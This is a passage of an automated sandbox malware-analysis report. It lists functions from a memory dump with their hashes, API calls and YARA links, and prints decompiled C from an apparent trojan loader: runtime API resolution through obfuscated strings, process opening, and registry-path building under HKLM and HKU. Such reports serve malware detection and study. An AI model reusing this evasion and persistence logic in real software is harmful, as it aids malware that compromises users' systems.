                                                                                                            • Instruction Fuzzy Hash: 7D01D639900625DBCF05DBA8CA547BD77B2AF45328F240409D8116B3C1DFB0D955CB81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F065303, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F06530A
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F065314
                                                                                                            • int.LIBCPMT ref: 6F06532B
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • messages.LIBCPMT ref: 6F06534E
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F065365
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F065385
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F065392
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                            • String ID:
                                                                                                            • API String ID: 958335874-0
                                                                                                            • Opcode ID: 66ba1d9f3965d7129c39076002f0efdb2bad12e8e6cd4a5a7a5c5d49088ef6b6
                                                                                                            • Instruction ID: c53367e5da18076c775b8cc2f6761c4e97f8ed00adfcba9b3de2d9db95452efa
                                                                                                            • Opcode Fuzzy Hash: 66ba1d9f3965d7129c39076002f0efdb2bad12e8e6cd4a5a7a5c5d49088ef6b6
                                                                                                            • Instruction Fuzzy Hash: 1101D635900625DBCF05DBA4CA407BDB7B2BF45728F244509E4116B2D1DFB0DE16CB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F06526E, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F065275
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F06527F
                                                                                                            • int.LIBCPMT ref: 6F065296
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • collate.LIBCPMT ref: 6F0652B9
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0652D0
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0652F0
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0652FD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                            • String ID:
                                                                                                            • API String ID: 1767075461-0
                                                                                                            • Opcode ID: 4b1241b8bc4c35a26273466b66544aaa571e5da99d2668c6172e9ac88528fb8f
                                                                                                            • Instruction ID: bfba6a3835b7de6a82e11b8b7b866dc6816a335474f9b64537e95858fe8f70e9
                                                                                                            • Opcode Fuzzy Hash: 4b1241b8bc4c35a26273466b66544aaa571e5da99d2668c6172e9ac88528fb8f
                                                                                                            • Instruction Fuzzy Hash: 5B01D23590062A9BCF05DBA8CA41BBD77B2BF8532CF640509D4116B2D1DFB0AD568B91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03031A24, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E03031A24(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x303d2a4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x303d294 = _t4;
					_t6 = GetCurrentProcessId();
					 *0x303d290 = _t6;
					 *0x303d29c = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x303d28c = _t7;
					if(_t7 == 0) {
						 *0x303d28c =  *0x303d28c | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









                                                                                                            0x03031a2c
                                                                                                            0x03031a32
                                                                                                            0x03031a39
                                                                                                            0x00000000
                                                                                                            0x03031a93
                                                                                                            0x03031a3b
                                                                                                            0x03031a43
                                                                                                            0x03031a50
                                                                                                            0x03031a50
                                                                                                            0x03031a90
                                                                                                            0x00000000
                                                                                                            0x03031a90
                                                                                                            0x03031a52
                                                                                                            0x03031a52
                                                                                                            0x03031a57
                                                                                                            0x03031a69
                                                                                                            0x03031a6e
                                                                                                            0x03031a74
                                                                                                            0x03031a7a
                                                                                                            0x03031a81
                                                                                                            0x03031a83
                                                                                                            0x03031a83
                                                                                                            0x00000000
                                                                                                            0x03031a8a
                                                                                                            0x03031a4c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x03031a4e
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,03032669,?,?,00000001,?,?,?,03031900,?), ref: 03031A2C
                                                                                                            • GetVersion.KERNEL32(?,00000001,?,?,?,03031900,?), ref: 03031A3B
                                                                                                            • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,03031900,?), ref: 03031A57
                                                                                                            • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,03031900,?), ref: 03031A74
                                                                                                            • GetLastError.KERNEL32(?,00000001,?,?,?,03031900,?), ref: 03031A93
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                                                                            • String ID: @MxtNxt
                                                                                                            • API String ID: 2270775618-1701360479
                                                                                                            • Opcode ID: a1ad7a452ed0e6784287bb2e614c5c6b5b972a19c5c524e60c54215312b792cf
                                                                                                            • Instruction ID: cb635c73d30c5eb52d3b7f278f7f400ac77769dce3714f45adc998d8372c09b8
                                                                                                            • Opcode Fuzzy Hash: a1ad7a452ed0e6784287bb2e614c5c6b5b972a19c5c524e60c54215312b792cf
                                                                                                            • Instruction Fuzzy Hash: D6F0227024B702AFE768FB34A8197293BADA70A302F080519F506DA1C8D778C040CF15
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F051666, Relevance: 9.4, APIs: 6, Instructions: 380memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Allocate$Max_value
                                                                                                            • String ID:
                                                                                                            • API String ID: 4124748770-0
                                                                                                            • Opcode ID: 4d81fa068d56198766d7190474467bb0191700b91bc271ed62945861b234f042
                                                                                                            • Instruction ID: 2d2eafec24b268c7fb78cba3d49179746e4d7f8ba88237a51f237343bc1dec86
                                                                                                            • Opcode Fuzzy Hash: 4d81fa068d56198766d7190474467bb0191700b91bc271ed62945861b234f042
                                                                                                            • Instruction Fuzzy Hash: 16C17272900319FFDB14DFA9D880A9FBBBAFF45254B1005AAE814D7241D771EA11CBE1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03031A9C, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 03031AF6
                                                                                                            • SysAllocString.OLEAUT32(0070006F), ref: 03031B0A
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 03031B1C
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 03031B84
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 03031B93
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 03031B9E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: String$AllocFree
                                                                                                            • String ID:
                                                                                                            • API String ID: 344208780-0
                                                                                                            • Opcode ID: 8301f765287160ca36e42fd1a109e51a8b0621cd070dbd6003c4ab6b82e0fadc
                                                                                                            • Instruction ID: 8587fdcbf80e3e82c265f4f0bfa17f5a7f78f1e3e3983a83a9866d153d6ff3d8
                                                                                                            • Opcode Fuzzy Hash: 8301f765287160ca36e42fd1a109e51a8b0621cd070dbd6003c4ab6b82e0fadc
                                                                                                            • Instruction Fuzzy Hash: 3F417E36D01609AFDB41EFB8C844ADEB7BDAF89310F144466E910EB220EA719906CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03034837, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E03034837(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E030375F6(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x303d2e0; // 0x22da5a8
					_t1 = _t23 + 0x303e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x303d2e0; // 0x22da5a8
					_t2 = _t26 + 0x303e782; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E03034AAB(_t54);
					} else {
						_t30 =  *0x303d2e0; // 0x22da5a8
						_t5 = _t30 + 0x303e76f; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x303d2e0; // 0x22da5a8
							_t7 = _t33 + 0x303e4ce; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x303d2e0; // 0x22da5a8
								_t9 = _t36 + 0x303e406; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x303d2e0; // 0x22da5a8
									_t11 = _t39 + 0x303e792; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E03039269(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                                                                                            0x03034846
                                                                                                            0x0303484a
                                                                                                            0x0303490c
                                                                                                            0x03034850
                                                                                                            0x03034850
                                                                                                            0x03034855
                                                                                                            0x03034868
                                                                                                            0x0303486a
                                                                                                            0x0303486f
                                                                                                            0x03034877
                                                                                                            0x0303487e
                                                                                                            0x03034880
                                                                                                            0x03034885
                                                                                                            0x03034904
                                                                                                            0x03034905
                                                                                                            0x03034887
                                                                                                            0x03034887
                                                                                                            0x0303488c
                                                                                                            0x03034894
                                                                                                            0x03034896
                                                                                                            0x0303489b
                                                                                                            0x00000000
                                                                                                            0x0303489d
                                                                                                            0x0303489d
                                                                                                            0x030348a2
                                                                                                            0x030348aa
                                                                                                            0x030348ac
                                                                                                            0x030348b1
                                                                                                            0x00000000
                                                                                                            0x030348b3
                                                                                                            0x030348b3
                                                                                                            0x030348b8
                                                                                                            0x030348c0
                                                                                                            0x030348c2
                                                                                                            0x030348c7
                                                                                                            0x00000000
                                                                                                            0x030348c9
                                                                                                            0x030348c9
                                                                                                            0x030348ce
                                                                                                            0x030348d6
                                                                                                            0x030348d8
                                                                                                            0x030348dd
                                                                                                            0x00000000
                                                                                                            0x030348df
                                                                                                            0x030348e5
                                                                                                            0x030348ea
                                                                                                            0x030348f1
                                                                                                            0x030348f6
                                                                                                            0x030348fb
                                                                                                            0x00000000
                                                                                                            0x030348fd
                                                                                                            0x03034900
                                                                                                            0x03034900
                                                                                                            0x030348fb
                                                                                                            0x030348dd
                                                                                                            0x030348c7
                                                                                                            0x030348b1
                                                                                                            0x0303489b
                                                                                                            0x03034885
                                                                                                            0x0303491a

                                                                                                            APIs
                                                                                                              • Part of subcall function 030375F6: RtlAllocateHeap.NTDLL(00000000,00000000,03034F70), ref: 03037602
                                                                                                            • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,0303101C,?,00000001,?,?,00000000,00000000), ref: 0303485C
                                                                                                            • GetProcAddress.KERNEL32(00000000,7243775A), ref: 0303487E
                                                                                                            • GetProcAddress.KERNEL32(00000000,614D775A), ref: 03034894
                                                                                                            • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 030348AA
                                                                                                            • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 030348C0
                                                                                                            • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 030348D6
                                                                                                              • Part of subcall function 03039269: memset.NTDLL ref: 030392E8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$AllocateHandleHeapModulememset
                                                                                                            • String ID:
                                                                                                            • API String ID: 1886625739-0
                                                                                                            • Opcode ID: 1e9cfcfb8a163705c8b358db257e86d5c5f931a1eb5b0aa0fc791c40123e3a41
                                                                                                            • Instruction ID: f1596ac58c22e431e234ae13449f3c4f251c897fea412ddfcdd08a0db37728c7
                                                                                                            • Opcode Fuzzy Hash: 1e9cfcfb8a163705c8b358db257e86d5c5f931a1eb5b0aa0fc791c40123e3a41
                                                                                                            • Instruction Fuzzy Hash: 22218EB150670AEFDB60EF6AC944EABB7ECEF153407044526E545CB201E774EA05CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F05E16B, Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 6F05E172
                                                                                                            • _Maklocstr.LIBCPMT ref: 6F05E1DB
                                                                                                            • _Maklocstr.LIBCPMT ref: 6F05E1ED
                                                                                                            • _Maklocchr.LIBCPMT ref: 6F05E205
                                                                                                            • _Maklocchr.LIBCPMT ref: 6F05E215
                                                                                                            • _Getvals.LIBCPMT ref: 6F05E237
                                                                                                              • Part of subcall function 6F05688C: _Maklocchr.LIBCPMT ref: 6F0568BB
                                                                                                              • Part of subcall function 6F05688C: _Maklocchr.LIBCPMT ref: 6F0568D1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                                                            • String ID:
                                                                                                            • API String ID: 3549167292-0
                                                                                                            • Opcode ID: 5f1613d908a44fe4e992e088a8d658f9b532a8a3e32ba0221b3b3006dfb9b6bb
                                                                                                            • Instruction ID: 5a86d52387b51dee96900d19db61df3489acb18be70ea900e9bcc43a13234524
                                                                                                            • Opcode Fuzzy Hash: 5f1613d908a44fe4e992e088a8d658f9b532a8a3e32ba0221b3b3006dfb9b6bb
                                                                                                            • Instruction Fuzzy Hash: 51219072D00318AADF18DFE4D944BDFBBA8EF05314F10845AF9199F285EBB49650CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F0655EC, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F0655F3
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0655FD
                                                                                                            • int.LIBCPMT ref: 6F065614
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F06564E
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F06566E
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F06567B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            • Opcode ID: 227dea0fc2bb8fb225aa1d30429c4e54ed3b876e18b471cf18234b9e7907a9a9
                                                                                                            • Instruction ID: 201d58da2ac1fc724ad4f6a899b619afd8bb750bcf199bc4360135ae88e8197d
                                                                                                            • Opcode Fuzzy Hash: 227dea0fc2bb8fb225aa1d30429c4e54ed3b876e18b471cf18234b9e7907a9a9
                                                                                                            • Instruction Fuzzy Hash: EA01F535900A29DBCF05DBB4CA40BBE77B2BF45328F640509E4116B3D1DFB0A916CB82
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F06542D, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F065434
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F06543E
                                                                                                            • int.LIBCPMT ref: 6F065455
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F06548F
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0654AF
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0654BC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            • Opcode ID: 81d73de713980821b5fc915940440fb4e75f6c3ae378bcacba98e3cf710f8027
                                                                                                            • Instruction ID: 92c9fbe0ceb0580cb492a74c56ae02fec3d5d0d8c6e9060ca89af0900dd9cfe8
                                                                                                            • Opcode Fuzzy Hash: 81d73de713980821b5fc915940440fb4e75f6c3ae378bcacba98e3cf710f8027
                                                                                                            • Instruction Fuzzy Hash: 3801F535900729DBCF05DBA8CA44BBEB7B2BF45368F240049E4106B3D2CFB4A912CB81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F065398, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F06539F
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0653A9
                                                                                                            • int.LIBCPMT ref: 6F0653C0
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0653FA
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F06541A
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F065427
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            • Opcode ID: 615741aed25f9eea7d872d28ffdb3cf8e40845b18207f1038ff2f489ef94798f
                                                                                                            • Instruction ID: 488b7b735b8239090ba841f9455642ca00d16b148e3fdf1375c6e9a5afbb71d7
                                                                                                            • Opcode Fuzzy Hash: 615741aed25f9eea7d872d28ffdb3cf8e40845b18207f1038ff2f489ef94798f
                                                                                                            • Instruction Fuzzy Hash: FA01F535904729DBCF05DBA8CA40BBEB7B2BF45728F240549E4106B2C1CFB0AE52CB81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0303282B, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 88%
                                                                                                            			E0303282B(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x303d37c);
					_t91 = 0x80000002;
					L6:
					_t59 = E03031922( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E03035C6E(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E03034AAB(_a8);
						goto L29;
					}
					_t64 =  *0x303d2b0; // 0x5319b38
					_t16 = _t64 + 0xc; // 0x5319c06
					_t65 = E03031922(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d0303c0
						if(E03034A6D(_t97,  *_t33, _t91, _a8,  *0x303d374,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x303d2e0; // 0x22da5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x303ea48; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x303ea43; // 0x55434b48
								_t69 = _t34;
							}
							if(E03035F64(_t69,  *0x303d374,  *0x303d378,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x303d2e0; // 0x22da5a8
									_t44 = _t71 + 0x303e83e; // 0x74666f53
									_t73 = E03031922(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d0303c0
										E03035DDA( *_t47, _t91, _a8,  *0x303d378, _a24);
										_t49 = _t101 + 0x10; // 0x3d0303c0
										E03035DDA( *_t49, _t91, _t99,  *0x303d370, _a16);
										E03034AAB(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d0303c0
									E03035DDA( *_t40, _t91, _a8,  *0x303d378, _a24);
									_t43 = _t101 + 0x10; // 0x3d0303c0
									E03035DDA( *_t43, _t91, _a8,  *0x303d370, _a16);
								}
								if( *_t101 != 0) {
									E03034AAB(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d0303c0
					_t81 = E030363F5( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d0303c0
							E03034A6D(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E03034AAB(_t100);
						_t98 = _a16;
					}
					E03034AAB(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E0303A938(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x303d37c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}























                                                                                                            0x0303282b
                                                                                                            0x03032834
                                                                                                            0x0303283b
                                                                                                            0x03032840
                                                                                                            0x030328ad
                                                                                                            0x030328b3
                                                                                                            0x030328b8
                                                                                                            0x030328bf
                                                                                                            0x030328c4
                                                                                                            0x030328c9
                                                                                                            0x03032a34
                                                                                                            0x03032a3b
                                                                                                            0x03032a3b
                                                                                                            0x03032a40
                                                                                                            0x03032a42
                                                                                                            0x03032a42
                                                                                                            0x03032a4b
                                                                                                            0x03032a4b
                                                                                                            0x030328cf
                                                                                                            0x030328db
                                                                                                            0x03032a2a
                                                                                                            0x03032a2d
                                                                                                            0x00000000
                                                                                                            0x03032a2d
                                                                                                            0x030328e1
                                                                                                            0x030328e6
                                                                                                            0x030328e9
                                                                                                            0x030328ee
                                                                                                            0x030328f3
                                                                                                            0x0303293c
                                                                                                            0x0303293c
                                                                                                            0x0303294f
                                                                                                            0x03032959
                                                                                                            0x0303295f
                                                                                                            0x03032966
                                                                                                            0x03032970
                                                                                                            0x03032970
                                                                                                            0x03032968
                                                                                                            0x03032968
                                                                                                            0x03032968
                                                                                                            0x03032968
                                                                                                            0x03032992
                                                                                                            0x0303299a
                                                                                                            0x030329c8
                                                                                                            0x030329cd
                                                                                                            0x030329d4
                                                                                                            0x030329d9
                                                                                                            0x030329dd
                                                                                                            0x03032a0f
                                                                                                            0x030329df
                                                                                                            0x030329ec
                                                                                                            0x030329ef
                                                                                                            0x030329ff
                                                                                                            0x03032a02
                                                                                                            0x03032a08
                                                                                                            0x03032a08
                                                                                                            0x0303299c
                                                                                                            0x030329a9
                                                                                                            0x030329ac
                                                                                                            0x030329be
                                                                                                            0x030329c1
                                                                                                            0x030329c1
                                                                                                            0x03032a19
                                                                                                            0x03032a25
                                                                                                            0x03032a1b
                                                                                                            0x03032a1e
                                                                                                            0x03032a1e
                                                                                                            0x03032a19
                                                                                                            0x03032992
                                                                                                            0x00000000
                                                                                                            0x03032959
                                                                                                            0x03032902
                                                                                                            0x03032905
                                                                                                            0x0303290c
                                                                                                            0x03032912
                                                                                                            0x03032915
                                                                                                            0x03032917
                                                                                                            0x03032923
                                                                                                            0x03032926
                                                                                                            0x03032926
                                                                                                            0x0303292c
                                                                                                            0x03032931
                                                                                                            0x03032931
                                                                                                            0x03032937
                                                                                                            0x00000000
                                                                                                            0x03032937
                                                                                                            0x03032845
                                                                                                            0x00000000
                                                                                                            0x0303286c
                                                                                                            0x0303286c
                                                                                                            0x03032878
                                                                                                            0x0303288b
                                                                                                            0x03032891
